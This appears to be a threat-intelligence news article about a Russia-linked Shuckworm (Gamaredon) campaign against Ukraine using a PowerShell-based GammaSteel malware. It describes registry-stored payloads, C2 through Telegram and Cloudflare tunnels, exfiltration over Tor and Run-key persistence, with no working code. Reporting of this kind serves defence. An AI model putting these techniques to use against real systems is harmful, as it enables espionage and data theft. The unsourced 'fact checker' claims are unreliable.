Russia-Linked Shuckworm Group Deploys Upgraded GammaSteel Malware in Stealthy Cyber Campaign Against Ukraine

Introduction:

In a new and increasingly sophisticated cyber espionage campaign, the Russian-affiliated hacking group Shuckworm—also known by aliases such as Gamaredon or Armageddon—has intensified its digital offensive against Ukrainian institutions. Between February and March 2025, cybersecurity experts detected a wave of attacks driven by a newly enhanced variant of the group’s notorious GammaSteel malware. This operation reflects the group’s evolution in cyber tactics, emphasizing stealth, persistence, and advanced data exfiltration capabilities.

The campaign reveals a notable shift in strategy, particularly the group’s reliance on PowerShell-based scripts and registry-stored payloads. These techniques are specifically crafted to bypass traditional detection systems while leveraging legitimate platforms such as Telegram and Cloudflare for concealment and control. Below, we dissect the components of this ongoing cyber campaign and what makes it particularly dangerous in today’s conflict-driven digital world.

Campaign Overview (Around 30 lines):

The Shuckworm group launched its latest cyberattack campaign on February 26, 2025.
Initial infection began via an infected removable drive, signaling a targeted and manual approach.
Malicious activity initiated with a crafted LNK file that created a Windows Registry value under the UserAssist key.
Obfuscated VBScript and PowerShell payloads were stored in the registry, making them harder to detect.

– Two critical registry files were involved:

NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms: Maintained contact with C&C servers using platforms like Telegram and Cloudflare.
NTUSER.DAT.TMContainer00000000000000000002.regtrans-ms: Altered registry settings, hid files, and propagated the malware using malicious shortcuts.
The malware used Cloudflare tunnels and decentralized services (like write.as, telegra.ph) for communication, complicating traceability.
GammaSteel, now primarily a PowerShell-based malware, shows enhanced reconnaissance features:
It collects screenshots, lists running processes, and extracts disk and antivirus data.
It filters specific file types such as DOC, XLS, PDF while avoiding typical system files.

– Exfiltration tactics have improved significantly:

Uses PowerShell or cURL via Tor proxies for stealth.
MD5 hashes of stolen files are created using certutil.exe to ensure data integrity.
Malware achieves persistence by registering itself in the Windows Run key.
Shuckworm employs modular payloads, split across registry values, making analysis and reverse engineering harder.
In several cases, the malware pulled additional payloads using PowerShell commands, enhancing its capabilities.

– Experts recommend proactive measures, especially in Ukraine:

– Monitor registry activities closely.

Disable use of removable drives in sensitive environments.
Deploy endpoint protection solutions like Symantec and monitor IOCs linked to the group.
The overall campaign underscores a growing and alarming trend of geopolitical cyber warfare in Eastern Europe.

What Undercode Say:

The Shuckworm campaign offers more than just another example of cyber espionage—it highlights a new tier of persistent threat operations that blur the lines between nation-state tactics and hacker innovations.

At the core of this attack is a hybridized methodology: combining old-school tactics like infected removable drives with modern-day obfuscation and legitimate platforms as communication backbones. By using Telegram, Teletype, and Cloudflare Tunnels, the attackers not only enhance their stealth but actively complicate the forensic trail, making it harder for defenders to trace and block.

GammaSteel’s evolution into a PowerShell-centric malware is a logical yet dangerous move. PowerShell, being a legitimate system tool, often flies under the radar of many detection systems. By embedding scripts directly into registry keys, the attackers bypass disk-based scanning tools entirely. This technique isn’t just clever—it’s a sign of the increasing professionalization and funding behind such state-sponsored actors.

The use of modular registry payloads—spreading malicious functions across various entries—makes reverse engineering a nightmare. It slows down incident response and analysis, giving the attackers more time to operate undetected. Furthermore, exfiltration via Tor and the use of file hashes before extraction suggest the attackers are aiming for high-value, authentic data, not just mass surveillance.

What’s more alarming is the infrastructure being used. Services like write.as and telegra.ph, known for privacy-focused publishing, are being weaponized to serve C&C purposes. This mirrors a growing tactic where legitimate, even “trusted,” platforms are hijacked for malicious use—blurring the line between safe and unsafe web destinations.

The persistence mechanism, registering malware in the Windows Run key, is old-school but effective. It guarantees the malware revives even after reboots, ensuring long-term access to compromised systems.

From a defense standpoint, organizations in high-risk regions, especially Ukraine, need to pivot from reactive to proactive. Relying solely on antivirus tools is no longer sufficient. Modern cyber defense requires behavioral analysis, memory-level monitoring, and threat hunting teams trained to deal with registry-based threats and PowerShell attacks.

In the grand scheme, Shuckworm’s campaign is a microcosm of broader geopolitical cyber conflict. It’s not just about stealing documents—it’s about destabilizing systems, sowing mistrust, and asserting dominance in the information war.

Fact Checker Results:

Multiple cybersecurity firms have confirmed Shuckworm’s involvement and the February–March 2025 timeline.
GammaSteel’s PowerShell variant and registry-based techniques are consistent with previously documented TTPs by Gamaredon.
Use of platforms like Telegram and Cloudflare as C&C channels is verified by open-source threat intelligence.